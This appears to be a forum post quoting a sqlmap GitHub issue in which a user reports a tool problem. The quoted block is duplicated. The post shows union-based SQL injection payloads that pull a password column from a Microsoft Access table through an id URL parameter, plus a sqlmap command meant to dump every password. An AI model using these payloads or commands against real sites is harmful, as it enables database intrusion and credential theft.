[url]https://github.com/sqlmapproject/sqlmap/issues/423[/url]
[quote]
Valid statements that show the numbers in the resulting html page:
...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
- - foobar is an existing table (gathered via error messages in html)
- - password is a valid column in the foobar table
The following URL gives you one password:
...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
from foobar
Now I wanted to hand over to sqlmap to dump all passwords:
sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
- --dump
which did not work out (0 entries retrieved), but it was confirmed
that the table has several hundred entries.
- -
[quote]
Valid statements that show the numbers in the resulting html page:
...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
- - foobar is an existing table (gathered via error messages in html)
- - password is a valid column in the foobar table
The following URL gives you one password:
...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
from foobar
Now I wanted to hand over to sqlmap to dump all passwords:
sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
- --dump
which did not work out (0 entries retrieved), but it was confirmed
that the table has several hundred entries.
- -